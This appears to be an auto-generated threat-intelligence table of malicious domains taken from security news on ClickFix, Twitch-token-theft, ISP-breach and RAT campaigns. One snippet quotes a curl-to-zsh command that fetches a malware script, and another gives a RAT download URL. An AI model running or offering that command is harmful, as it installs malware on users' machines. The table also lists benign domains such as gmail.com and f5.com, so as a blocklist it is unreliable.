Indicators of compromise
1,030 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| domain | code-desktop.com | sk-guide[.]com) and 11 used other developer tools as lures (code-desktop[.]com). “The campaign proves once again why trusted distributio | HBO Max Reddit account compromised to serve ClickFix attacks The Register · Security | · 2d ago |
| domain | codex-craft.com | trick prospective victims via an OpenAI Codex theme (with a codex-craft[.]com) landing page. Of the rest: 15 purported to be a macOS di | HBO Max Reddit account compromised to serve ClickFix attacks The Register · Security | · 2d ago |
| domain | hbomax-macos.com | Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospective victims via an Ope | HBO Max Reddit account compromised to serve ClickFix attacks The Register · Security | · 2d ago |
| domain | hbomaxx.app | s, 46 used an HBO Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospect | HBO Max Reddit account compromised to serve ClickFix attacks The Register · Security | · 2d ago |
| domain | hbomaxx.us | n be taken to a “somewhat-legitimate” looking landing page (hbomaxx[.]us) that includes a join/download button. REG AD Clicking th | HBO Max Reddit account compromised to serve ClickFix attacks The Register · Security | · 2d ago |
| domain | ttvnw.net | tension redirects Twitch’s video playlist request (to usher.ttvnw[.]net ) through that proxy, it appends the token as an &auth= q | Twitch extension with 30K installs exposes users’ OAuth tokens BleepingComputer | · 2d ago |
| domain | clean-disk-guide.com | AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbo | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 2d ago |
| domain | code-desktop.com | , 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the a | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 2d ago |
| domain | codex-craft.com | hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing t | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 2d ago |
| domain | ember-bridge.com | lowing command: export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh Hudson Rock noted ember-b | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 2d ago |
| domain | hbomax-macos.com | .]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the attackers to target a larger audience t | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 2d ago |
| domain | hbomaxx.app | ddit account. The researchers identified 40 ads pointing to hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[ | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 2d ago |
| domain | hbomaxx.us | Max subreddits," warned the user . "The advert takes you to hbomaxx[.]us which looks somewhat legitimate, and has a join button / | Hackers hijack HBO Max Reddit account to push malware in ClickFix ads BleepingComputer | · 2d ago |
| domain | agent.3bb.co | eshagent/ Targets: mail.3bb.co[.]th (FortiGate SSL-VPN) and agent.3bb.co[.]th (internal portal) The full list of indicators, along w | 3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials The Hacker News | · 2d ago |
| domain | ayuthayatech.com | reporting to a control server that the attacker ran at www.ayuthayatech[.]com, under a device group named TH-3BB . Attackers increasing | 3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials The Hacker News | · 2d ago |
| domain | co.th | s over SSH, probed 3BB's internal sales portal at agent.3bb.co[.]th, and searched compromised machines for stored passwords, | 3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials The Hacker News | · 2d ago |
| domain | hunt.io | tacker's commands, and add SSH keys as backup ways back in. Hunt.io said the attacker's main goal was 3BB's subscriber data. Sc | 3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials The Hacker News | · 2d ago |
| domain | ayuthayatech.com | s to a device group named TH-3BB and directed agents to www.ayuthayatech[.]com over port 443. A devices.json export listed multiple enro | Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider Cyber Security News | · 2d ago |
| domain | co.th | a FortiGate 60F SSL-VPN appliance exposed through mail.3bb.co[.]th:10443. Eight reconnaissance scripts fingerprinted the VPN | Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider Cyber Security News | · 2d ago |
| domain | hunt.io | configuration. Attack server file directory (Image Source: Hunt.io) Multiple artifacts referenced 3BB infrastructure directly, | Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider Cyber Security News | · 2d ago |
| domain | triplet.co | , including internal 10.11.x.x addresses, systems under the triplet.co.th domain, and organization-specific credentials. A capture | Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider Cyber Security News | · 2d ago |
| domain | f5.com | allowlists. Vulnerability scan distribution (Image Source: f5.com) Most activity originated from cloud-hosting infrastructure | Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials Cyber Security News | · 2d ago |
| domain | server.host | se it to LAN or public interfaces through the –host option, server.host configuration, container port mappings, Kubernetes ingress | Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials Cyber Security News | · 2d ago |
| domain | server.host | pose it online through passing the --host flag, setting the server.host, or misconfigured Docker port mappings. The technology comp | Hackers target exposed Vite dev servers to steal AWS, Azure secrets BleepingComputer | · 3d ago |
| domain | alexue4.dev | m Developer email listed by chrome-stats Website identifier alexue4[.]dev Copyright identifier linked to the operator IP address 15 | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | api.jeetbot.cc | 7[.]186 netcup GmbH, Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | drisnya.online | 6154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; host | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | enhanced-1.jeetbot.cc | tbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]113[.]25 CLODO Cloud, AS216154; | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | enhanced.jeetbot.cc | Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]1 | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | ext-03.jeetbot.cc | IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; hosts ext-03[.]jeetbot[.]cc Domain jeetbot[.]cc Operator-controlled domain Domain a | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | ext-styles.jeetbot.cc | P address 132[.]243[.]113[.]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.] | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | gmail.com | tbot[.]cc Operator contact address Email address cybergnyda@gmail[.]com Developer email listed by chrome-stats Website identifier | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | img.drisnya.online | elper/ Public extension-helper API endpoint Screenshot host img[.]drisnya[.]online Image hosting endpoint associated with the operation Hi | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | jeetbot.cc | ssociated with the extension listings Email address support@jeetbot[.]cc Operator contact address Email address cybergnyda@gmail[. | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | morphilina.me | ]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | proxy.morphilina.me | jeetbot[.]cc Alternate operator proxy C2 and proxy endpoint proxy[.]morphilina[.]me Token-strip proxy endpoint Configuration endpoint ext-s | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | proxy.thebeholder.deno.net | up token-collection endpoint Historical collection endpoint proxy[.]thebeholder[.]deno[.]net/set-token Decommissioned backup token-collection endp | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | thebeholderbotapi.vercel.app | ssioned backup token-collection endpoint Privacy-policy URL thebeholderbotapi[.]vercel[.]app/twitch-conf Privacy-policy host cited in the investigat | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | thebeholder-proxy.deno.dev | ed token-collection endpoint Historical collection endpoint thebeholder-proxy[.]deno[.]dev/set-token Decommissioned backup token-collection endpoi | Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users Cyber Security News | · 3d ago |
| domain | mail.uaiubifas.top | Staging server hosted on Alibaba Cloud in Hong Kong Domain mail.uaiubifas.top GRAYRABBIT command-and-control domain using port 443 SHA-25 | One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users Cyber Security News | · 3d ago |
| domain | noht1ng.top | thod protocol link used to trigger the exploit chain Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging | One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users Cyber Security News | · 3d ago |
| domain | 115.201.178.68.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[ | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | 116.181.62.50.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[. | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | 128.200.178.68.host.secureserver.net | a0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b HTA downloader Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[. | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | 129.202.178.68.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.] | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | 13.189.202.64.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[. | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | 135.201.178.68.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.] | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | 162.201.178.68.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[ | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | 181.202.178.68.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[ | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | 48.178.169.192.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.]192[.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[ | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | 76.180.62.50.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]co | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | 85.182.62.50.host.secureserver.net | [.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[ | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | gexwalltool.com | [.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]c | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | x-wolverine.servebbs.com | ure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]com Campaign infrastructure IP address 72[.]167[.]48[.]63 C | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 3d ago |
| domain | noht1ng.top | ryption RC4-encrypted communications Exploit-hosting domain noht1ng[.]top Staging-server IP address 8.218.50[.]207 Staging-server p | China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor GBHackers | · 3d ago |
| domain | uaiubifas.top | re. In this campaign, the payload reportedly contacted mail.uaiubifas[.]top over raw TCP port 443 and encrypted fixed-size 4,096-byte | China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor GBHackers | · 3d ago |
| domain | achievershelf.space | to CL-CRI-1171 activity and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[ | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | activitykitty.xyz | CL-CRI-1171 gate and landing infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | activitymeal.space | and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[ | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | additionplot.cfd | down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementju | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | adviceturn.xyz | shelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airpl | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | afternoonscrew.space | ivitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[. | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | agreementjuice.space | ionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | airplaneiron.xyz | n[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | airtwig.xyz | rew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[ | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | amazingshield.xyz | a.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agent URL | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | amountfuel.icu | reementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 g | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | animalrecord.xyz | e ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infra | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | animalview.xyz | o OfferLoader payload handoff and second-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[. | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | apparatustaste.xyz | infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | apparatustruck.xyz | z ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain appare | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | apparelplate.space | ck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[ | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | archairport.xyz | te and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.] | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | armcard.xyz | ctivitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | atthelake.info | allback, and script infrastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[ | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | authoritykittens.info | structure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; ba | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | babyvein.xyz | ate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | badgeterritory.xyz | nect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; con | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | badgewing.xyz | hairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[ | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | bagcare.space | uthoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumo | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | baitmetal.xyz | nect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | basesfile.com | noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstor | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | basesfiles.com | frastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | basinpleasure.xyz | info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesir | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | basketballyear.xyz | ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | baskethumor.xyz | care[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplaygro | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | bedroomdesire.xyz | pleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonke | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | beefteeth.xyz | ct.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xy | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | beliefpicture.xyz | tballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymag | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | believesisters.xyz | connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]x | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | bellplayground.xyz | ethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[ | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | bikesdonkey.info | desire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychick | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | birthdaymagic.xyz | picture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.] | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | blogspot.com | ferLoader installation-tracker infrastructure Domain velfps.blogspot[.]com ; velvoxlab.blogspot[.]com ; venrx.blogspot[.]com ; venrx | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | boardmagic.info | vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader in | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | boatthought.xyz | ayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[ | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | boundarychickens.xyz | esdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xy | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | boundaryfly.xyz | ct.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | boytank.xyz | ymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[. | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
| domain | branchmorning.xyz | oatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[ | Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker Cyber Security News | · 3d ago |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.